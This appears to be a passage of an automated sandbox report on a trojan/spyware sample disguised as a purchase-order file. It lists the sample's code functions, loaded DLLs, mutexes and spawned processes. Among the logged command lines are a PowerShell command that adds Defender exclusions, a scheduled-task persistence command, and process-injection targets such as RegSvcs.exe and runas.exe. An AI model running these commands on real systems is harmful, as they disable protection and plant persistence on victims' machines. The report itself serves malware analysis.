                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC9EB014_2_00EC9EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC1F9214_2_00EC1F92
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A244618_2_045A2446
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0459442018_2_04594420
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0459E4F618_2_0459E4F6
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F053518_2_044F0535
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045B059118_2_045B0591
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450C6E018_2_0450C6E0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0451475018_2_04514750
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F077018_2_044F0770
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044EC7C018_2_044EC7C0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0458200018_2_04582000
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0457815818_2_04578158
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0458A11818_2_0458A118
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044E010018_2_044E0100
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A81CC18_2_045A81CC
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045B01AA18_2_045B01AA
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A41A218_2_045A41A2
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0459027418_2_04590274
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045702C018_2_045702C0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AA35218_2_045AA352
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045B03E618_2_045B03E6
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044FE3F018_2_044FE3F0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F0C0018_2_044F0C00
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044E0CF218_2_044E0CF2
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04590CB518_2_04590CB5
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0458CD1F18_2_0458CD1F
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044FAD0018_2_044FAD00
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044EADE018_2_044EADE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04508DBF18_2_04508DBF
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F0E5918_2_044F0E59
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AEE2618_2_045AEE26
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AEEDB18_2_045AEEDB
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04502E9018_2_04502E90
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045ACE9318_2_045ACE93
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04564F4018_2_04564F40
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04510F3018_2_04510F30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04592F3018_2_04592F30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04532F2818_2_04532F28
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044E2FC818_2_044E2FC8
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0456EFA018_2_0456EFA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F284018_2_044F2840
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044FA84018_2_044FA840
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0451E8F018_2_0451E8F0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044D68B818_2_044D68B8
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450696218_2_04506962
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F29A018_2_044F29A0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045BA9A618_2_045BA9A6
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044EEA8018_2_044EEA80
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AAB4018_2_045AAB40
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A6BD718_2_045A6BD7
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044E146018_2_044E1460
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AF43F18_2_045AF43F
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A757118_2_045A7571
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045B95C318_2_045B95C3
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0458D5B018_2_0458D5B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0453563018_2_04535630
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A16CC18_2_045A16CC
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AF7B018_2_045AF7B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F70C018_2_044F70C0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0459F0CC18_2_0459F0CC
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A70E918_2_045A70E9
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AF0E018_2_045AF0E0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045BB16B18_2_045BB16B
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0452516C18_2_0452516C
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044DF17218_2_044DF172
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044FB1B018_2_044FB1B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450B2C018_2_0450B2C0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450D2F018_2_0450D2F0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045912ED18_2_045912ED
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F52A018_2_044F52A0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044DD34C18_2_044DD34C
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A132D18_2_045A132D
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0453739A18_2_0453739A
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04569C3218_2_04569C32
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AFCF218_2_045AFCF2
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A1D5A18_2_045A1D5A
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F3D4018_2_044F3D40
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A7D7318_2_045A7D73
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450FDC018_2_0450FDC0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F9EB018_2_044F9EB0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AFF0918_2_045AFF09
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F1F9218_2_044F1F92
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AFFB118_2_045AFFB1
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0455D80018_2_0455D800
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F38E018_2_044F38E0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450B95018_2_0450B950
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_044F995018_2_044F9950
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0458591018_2_04585910
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AFA4918_2_045AFA49
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045A7A4618_2_045A7A46
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04563A6C18_2_04563A6C
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0459DAC618_2_0459DAC6
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04535AA018_2_04535AA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0458DAAC18_2_0458DAAC
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04591AA318_2_04591AA3
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045AFB7618_2_045AFB76
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04565BF018_2_04565BF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0452DBF918_2_0452DBF9
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0450FB8018_2_0450FB80
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_00501FE018_2_00501FE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_004FCED018_2_004FCED0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_004FB0E018_2_004FB0E0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_004FD0F018_2_004FD0F0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_004FB22518_2_004FB225
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_004FB23018_2_004FB230
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_005056B018_2_005056B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0050386918_2_00503869
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_005038B018_2_005038B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0051BDA018_2_0051BDA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0430E74C18_2_0430E74C
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0430E3B718_2_0430E3B7
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0430D81818_2_0430D818
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F07E54 appears 96 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0158B970 appears 262 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015E7E54 appears 107 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0161F290 appears 103 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0160EA12 appears 86 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F2EA12 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015D5130 appears 58 times
                      Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 0455EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 04525130 appears 58 times
                      Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 0456F290 appears 103 times
                      Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 044DB970 appears 262 times
                      Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 04537E54 appears 107 times
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: invalid certificate
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeBinary or memory string: OriginalFilename vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1794907046.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000000.1692196796.00000000009A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQIoK.exe: vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeBinary or memory string: OriginalFilenameQIoK.exe: vs Pre Alert PO TVKJEANSA00967.bat.exe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: STiokuWkiGFJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, Factory.csTask registration methods: 'CreateFileTaskExtractor', 'CreateTaskReportGererator'
                      Source: STiokuWkiGFJ.exe.0.dr, Factory.csTask registration methods: 'CreateFileTaskExtractor', 'CreateTaskReportGererator'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, qRBbpxao885KWSeQTv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, qRBbpxao885KWSeQTv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@5/5
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeFile created: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMutant created: \Sessions\1\BaseNamedObjects\pClOCSmehrwiOIZcl
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp63ED.tmpJump to behavior
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: runas.exe, 00000012.00000003.2248830957.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.00000000005BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Pre Alert PO TVKJEANSA00967.bat.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeFile read: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                      Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                      Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
